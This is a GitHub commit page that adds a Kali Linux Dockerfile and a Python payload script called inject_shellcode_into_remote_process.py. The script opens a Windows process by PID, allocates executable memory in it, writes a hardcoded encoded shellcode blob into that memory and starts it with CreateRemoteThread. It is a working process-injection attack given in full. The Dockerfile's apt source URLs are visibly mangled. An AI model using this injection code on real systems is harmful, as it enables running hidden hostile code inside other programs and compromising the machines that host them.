few additions

digideskio · Sep 5, 2015 · 2507cfc · 2507cfc
1 parent 656e5a0
commit 2507cfc
Show file tree

Hide file tree

Showing 2 changed files with 44 additions and 0 deletions.
diff --git a/Dockerfiles/Dockerfile_kali b/Dockerfiles/Dockerfile_kali
@@ -0,0 +1,12 @@
+FROM officialkali/kali
+MAINTAINER [email protected]
+
+RUN echo "deb http:https://http.kali.org/kali sana main contrib non-free" > /etc/apt/sources.list && \
+echo "deb-src http:https://http.kali.org/kali sana main contrib non-free" >> /etc/apt/sources.list && \
+echo "deb http:https://security.kali.org/kali-security sana/updates main contrib non-free" >> /etc/apt/sources.list && \
+echo "deb-src http:https://security.kali.org/kali-security sana/updates main contrib non-free" >> /etc/apt/sources.list
+ENV DEBIAN_FRONTEND noninteractive
+RUN apt-get -y update && apt-get -y dist-upgrade && apt-get clean
+
+CMD ["/bin/bash"]
+
diff --git a/Vulnerabilities_and_Exploits/Payloads/inject_shellcode_into_remote_process.py b/Vulnerabilities_and_Exploits/Payloads/inject_shellcode_into_remote_process.py
@@ -0,0 +1,32 @@
+# import ctypes to interact witht eh Windows API
+from ctypes import *
+
+# sets the section of memory that stores shellcode as RWX
+page_rwx_value = 0x40
+
+# all possible rights
+process_all = 0x1F0FFF
+
+# allocate memory, ensure it is zeroed for writting to memory
+memcommit = 0x00001000
+
+# stores the available calls from windll.kernel32
+kernel32_variable = windll.kernel32
+
+shellcode = "\xbb\xbb\x48\x30\x8d\xdb\xdd\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x47\x83\xe8\xfc\x31\x58\x0f\x03\x58\xb4\xaa\xc5\x71\x22\xa8\x26\x8a\xb2\xcd\xaf\x6f\x83\xcd\xd4\xe4\xb3\xfd\x9f\xa9\x3f\x75\xcd\x59\xb4\xfb\xda\x6e\x7d\xb1\x3c\x40\x7e\xea\x7d\xc3\xfc\xf1\x51\x23\x3d\x3a\xa4\x22\x7a\x27\x45\x76\xd3\x23\xf8\x67\x50\x79\xc1\x0c\x2a\x6f\x41\xf0\xfa\x8e\x60\xa7\x71\xc9\xa2\x49\x56\x61\xeb\x51\xbb\x4c\xa5\xea\x0f\x3a\x34\x3b\x5e\xc3\x9b\x02\x6f\x36\xe5\x43\x57\xa9\x90\xbd\xa4\x54\xa3\x79\xd7\x82\x26\x9a\x7f\x40\x90\x46\x7e\x85\x47\x0c\x8c\x62\x03\x4a\x90\x75\xc0\xe0\xac\xfe\xe7\x26\x25\x44\xcc\xe2\x6e\x1e\x6d\xb2\xca\xf1\x92\xa4\xb5\xae\x36\xae\x5b\xba\x4a\xed\x33\x0f\x67\x0e\xc3\x07\xf0\x7d\xf1\x88\xaa\xe9\xb9\x41\x75\xed\xbe\x7b\xc1\x61\x41\x84\x32\xab\x85\xd0\x62\xc3\x2c\x59\xe9\x13\xd1\x8c\xbe\x43\x7d\x7f\x7f\x34\x3d\x2f\x17\x5e\xb2\x10\x07\x61\x19\x39\xa2\x9b\xc9\x86\x9b\x9b\x96\x6f\xde\xe3\x89\x8c\x57\x05\xa3\x42\x3e\x9d\x5b\xfa\x1b\x55\xfa\x03\xb6\x13\x3c\x8f\x35\xe3\xf2\x78\x33\xf7\x62\x89\x0e\xa5\x24\x96\xa4\xc0\xc8\x02\x43\x43\x9f\xba\x49\xb2\xd7\x64\xb1\x91\x6c\xac\x27\x5a\x1a\xd1\xa7\x5a\xda\x87\xad\x5a\xb2\x7f\x96\x08\xa7\x7f\x03\x3d\x74\xea\xac\x14\x29\xbd\xc4\x9a\x14\x89\x4a\x64\x73\x0b\xb6\xb3\xbd\x79\xd6\x07"
+
+# process ID that the shellcode will be injected into
+process_id = 1234
+shellcode_length = len(shellcode)
+
+# makes a call to OpenProcess
+process_handle = kernel32_variable.OpenProcess(process_all, False, process_id)
+
+# calls VirtualAllocEx, function that allocates memory in remote process
+memory_allocation_variable = kernel32_variable.VirtualAllocEx(process_handle, 0, shellcode_length, memcommit, page_rwx_value)
+
+# writes shellcode to the are of memory within the process
+kernel32_variable.WriteProcessMemory(process_handle, memory_allocation_variable, shellcode, shellcode_length, 0)
+
+# creates thread within the another process
+kernel32_variable.CreateRemoteThread(process_handle, None, 0, memory_allocation_variable, 0, 0, 0)